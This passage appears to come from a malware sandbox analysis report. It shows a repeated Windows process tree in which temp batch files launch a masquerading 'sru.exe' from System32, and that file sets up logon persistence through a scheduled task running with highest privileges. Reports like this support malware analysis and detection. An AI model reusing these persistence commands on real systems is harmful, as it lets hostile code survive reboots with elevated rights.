C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV154⤵PID:2752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Q6zWdIU0knaH.bat" "53⤵PID:4356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV154⤵PID:4804
-
-
C:\Windows\system32\chcp.comchcp 6500154⤵PID:1864
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost54⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2216
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"54⤵
- Drops file in System32 directory
PID:3012 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f55⤵
- Scheduled Task/Job: Scheduled Task
PID:2920 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV156⤵PID:1668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uGoXW9HESwfY.bat" "55⤵PID:1512
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV156⤵PID:2368
-
-
C:\Windows\system32\chcp.comchcp 6500156⤵PID:2660
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost56⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:764
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"56⤵
- Drops file in System32 directory
PID:1824 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f57⤵PID:772
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV158⤵PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JxXn6UuET7rM.bat" "57⤵PID:4020
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV158⤵PID:4728
-
-
C:\Windows\system32\chcp.comchcp 6500158⤵PID:3904
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost58⤵PID:1548
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"58⤵
- Drops file in System32 directory
PID:2096 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f59⤵
- Scheduled Task/Job: Scheduled Task
PID:764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV160⤵PID:1048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\smdMTCmD4hyl.bat" "59⤵PID:3264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV160⤵PID:4712
-
-
C:\Windows\system32\chcp.comchcp 6500160⤵PID:332
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost60⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4452
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"60⤵
- Drops file in System32 directory
PID:2420 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f61⤵PID:1012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV162⤵PID:4628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WaiCDLuE7756.bat" "61⤵PID:2052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV162⤵PID:456
-
-
C:\Windows\system32\chcp.comchcp 6500162⤵PID:1836
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost62⤵PID:3044
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"62⤵
- Drops file in System32 directory
PID:2664 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f63⤵
- Scheduled Task/Job: Scheduled Task
PID:3928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV164⤵PID:2956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yy9Uao7bARcz.bat" "63⤵PID:548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV164⤵PID:2144
-
-
C:\Windows\system32\chcp.comchcp 6500164⤵PID:952
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost64⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4200
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"64⤵PID:2908
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f65⤵
- Scheduled Task/Job: Scheduled Task
PID:2216 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV166⤵PID:3448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XJohN635Fe1J.bat" "65⤵PID:3136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV166⤵PID:1004
-
-
C:\Windows\system32\chcp.comchcp 6500166⤵PID:788
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost66⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3700
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"66⤵
- Drops file in System32 directory
PID:1560 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f67⤵
- Scheduled Task/Job: Scheduled Task
PID:1656 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV168⤵PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5izXRKC0a10Z.bat" "67⤵PID:3496
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV168⤵PID:3968
-
-
C:\Windows\system32\chcp.comchcp 6500168⤵PID:1860
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost68⤵
- Runs ping.exe
PID:3176
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"68⤵
- Drops file in System32 directory
PID:4712 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f69⤵
- Scheduled Task/Job: Scheduled Task
PID:1360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV170⤵PID:3500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gt8crgzVaO40.bat" "69⤵PID:1584
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV170⤵PID:1464
-
-
C:\Windows\system32\chcp.comchcp 6500170⤵PID:3960
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost70⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2772
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"70⤵PID:236
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f71⤵
- Scheduled Task/Job: Scheduled Task
PID:2216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DwtwHrlg1Mme.bat" "71⤵PID:4180
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV172⤵PID:1088
-
-
C:\Windows\system32\chcp.comchcp 6500172⤵PID:856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost72⤵
- Runs ping.exe
PID:4216
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"72⤵PID:2120
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f73⤵
- Scheduled Task/Job: Scheduled Task
PID:1224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3GNznQZjJDpW.bat" "73⤵PID:3768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV174⤵PID:4628
-
-
C:\Windows\system32\chcp.comchcp 6500174⤵PID:3052
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost74⤵PID:1324
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"74⤵
- Drops file in System32 directory
PID:4764 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f75⤵
- Scheduled Task/Job: Scheduled Task
PID:2152 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV176⤵PID:3596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ftd9H6hEbYK.bat" "75⤵PID:1088
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV176⤵PID:2172
-
-
C:\Windows\system32\chcp.comchcp 6500176⤵PID:4672
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost76⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4020
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"76⤵PID:1368
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f77⤵
- Scheduled Task/Job: Scheduled Task
PID:2532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GCKk0Gu7ugYA.bat" "77⤵PID:2884
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV178⤵PID:2572
-
-
C:\Windows\system32\chcp.comchcp 6500178⤵PID:3320
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost78⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4332
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"78⤵PID:1836
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f79⤵
- Scheduled Task/Job: Scheduled Task
PID:3984 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV180⤵PID:2660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P4iS3ldYkgRD.bat" "79⤵PID:2504
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV180⤵PID:2632
-
-
C:\Windows\system32\chcp.comchcp 6500180⤵PID:3132
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost80⤵
- Runs ping.exe
PID:2936
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"80⤵PID:4628
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f81⤵
- Scheduled Task/Job: Scheduled Task
PID:4204 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV182⤵PID:2804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FGNuafOygyn0.bat" "81⤵PID:3216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV182⤵PID:1912
-
-
C:\Windows\system32\chcp.comchcp 6500182⤵PID:3428
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost82⤵
- Runs ping.exe
PID:3448
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"82⤵
- Drops file in System32 directory
PID:796 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f83⤵
- Scheduled Task/Job: Scheduled Task
PID:2008 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV184⤵PID:4840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\a6nnoTyAsMej.bat" "83⤵PID:2552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV184⤵PID:3784
-
-
C:\Windows\system32\chcp.comchcp 6500184⤵PID:2632
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost84⤵PID:3500
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"84⤵
- Drops file in System32 directory
PID:4452 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f85⤵PID:4084
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV186⤵PID:4576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CgsKcNVXGMyn.bat" "85⤵PID:332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV186⤵PID:2932
-
-
C:\Windows\system32\chcp.comchcp 6500186⤵PID:2856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost86⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3528
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"86⤵
- Drops file in System32 directory
PID:852 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f87⤵
- Scheduled Task/Job: Scheduled Task
PID:1908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV188⤵PID:480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lgPTOpG51fVc.bat" "87⤵PID:4852
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV188⤵PID:2752
-
-
C:\Windows\system32\chcp.comchcp 6500188⤵PID:4020
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost88⤵PID:2868
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"88⤵PID:4664
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f89⤵PID:2920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LaVHuN9R0e9z.bat" "89⤵PID:1912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV190⤵PID:2184
-
-
C:\Windows\system32\chcp.comchcp 6500190⤵PID:4784
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost90⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4808
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"90⤵
- Drops file in System32 directory
PID:852 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f91⤵PID:5084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fRQB6YZZu1Ww.bat" "91⤵PID:3112
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV192⤵PID:3412
-
-
C:\Windows\system32\chcp.comchcp 6500192⤵PID:3500
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost92⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:952
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"92⤵
- Drops file in System32 directory
PID:4888 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f93⤵
- Scheduled Task/Job: Scheduled Task
PID:5064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV194⤵PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lEjl22QkwawU.bat" "93⤵PID:3968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV194⤵PID:2092
-
-
C:\Windows\system32\chcp.comchcp 6500194⤵PID:3536
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost94⤵PID:5088
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"94⤵PID:2160
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f95⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V5vWPzOP5MpU.bat" "95⤵PID:3044
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV196⤵PID:3088
-
-
C:\Windows\system32\chcp.comchcp 6500196⤵PID:3004
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost96⤵
- Runs ping.exe
PID:3384
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"96⤵PID:2796
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f97⤵
- Scheduled Task/Job: Scheduled Task
PID:5048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV198⤵PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MohFfDN3xEHs.bat" "97⤵PID:2172
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV198⤵PID:1560
-
-
C:\Windows\system32\chcp.comchcp 6500198⤵PID:3932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost98⤵PID:3924
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"98⤵PID:3216
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f99⤵
- Scheduled Task/Job: Scheduled Task
PID:4688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1100⤵PID:4772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YJ15UV5hPTA9.bat" "99⤵PID:1744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1100⤵PID:2584
-
-
C:\Windows\system32\chcp.comchcp 65001100⤵PID:1360
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost100⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1608
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"100⤵PID:2508
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f101⤵PID:1640
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1102⤵PID:3664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aZJPD6Pu6RuP.bat" "101⤵PID:1860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1102⤵PID:952
-
-
C:\Windows\system32\chcp.comchcp 65001102⤵PID:2920
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost102⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1056
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"102⤵PID:4944
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f103⤵PID:4784
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1104⤵PID:896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\quPq2sFqNpFu.bat" "103⤵PID:5000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1104⤵PID:3208
-
-
C:\Windows\system32\chcp.comchcp 65001104⤵PID:3176
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost104⤵PID:4804
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"104⤵
- Drops file in System32 directory
PID:3248 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f105⤵
- Scheduled Task/Job: Scheduled Task
PID:5032 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1106⤵PID:4524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wc4VE7IbA3hl.bat" "105⤵PID:2752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1106⤵PID:2660
-
-
C:\Windows\system32\chcp.comchcp 65001106⤵PID:4600
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost106⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1224
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"106⤵PID:4844
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f107⤵
- Scheduled Task/Job: Scheduled Task
PID:2864 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1108⤵PID:984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1UeFWmlTrc5U.bat" "107⤵PID:856
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1108⤵PID:1924
-
-
C:\Windows\system32\chcp.comchcp 65001108⤵PID:2984
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost108⤵PID:1460
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"108⤵
- Drops file in System32 directory
PID:2932 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f109⤵
- Scheduled Task/Job: Scheduled Task
PID:3536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ApWiMRJVnQTX.bat" "109⤵PID:456
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1110⤵PID:656
-
-
C:\Windows\system32\chcp.comchcp 65001110⤵PID:4936
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost110⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3800
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"110⤵
- Drops file in System32 directory
PID:1804 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f111⤵
- Scheduled Task/Job: Scheduled Task
PID:3528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1112⤵PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\z3GodUZwOG4Z.bat" "111⤵PID:2648
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1112⤵PID:852
-
-
C:\Windows\system32\chcp.comchcp 65001112⤵PID:4796
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost112⤵
- Runs ping.exe
PID:2880
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"112⤵
- Drops file in System32 directory
PID:1884 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f113⤵
- Scheduled Task/Job: Scheduled Task
PID:3096 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1114⤵PID:1876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\K7MTgZiCZzrR.bat" "113⤵PID:3852
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1114⤵PID:1160
-
-
C:\Windows\system32\chcp.comchcp 65001114⤵PID:1156
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost114⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2920
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"114⤵PID:4540
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f115⤵PID:4752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\biAEUrFS4YFh.bat" "115⤵PID:3340
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1116⤵PID:920
-
-
C:\Windows\system32\chcp.comchcp 65001116⤵PID:3132
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost116⤵
- Runs ping.exe
PID:4492
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"116⤵PID:2664
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f117⤵
- Scheduled Task/Job: Scheduled Task
PID:3208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LKoReBTn7EAg.bat" "117⤵PID:1288
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1118⤵PID:3920
-
-
C:\Windows\system32\chcp.comchcp 65001118⤵PID:1012
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost118⤵PID:2144
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"118⤵
- Drops file in System32 directory
PID:4332 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f119⤵
- Scheduled Task/Job: Scheduled Task
PID:2040 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1120⤵PID:1460
-
-
-
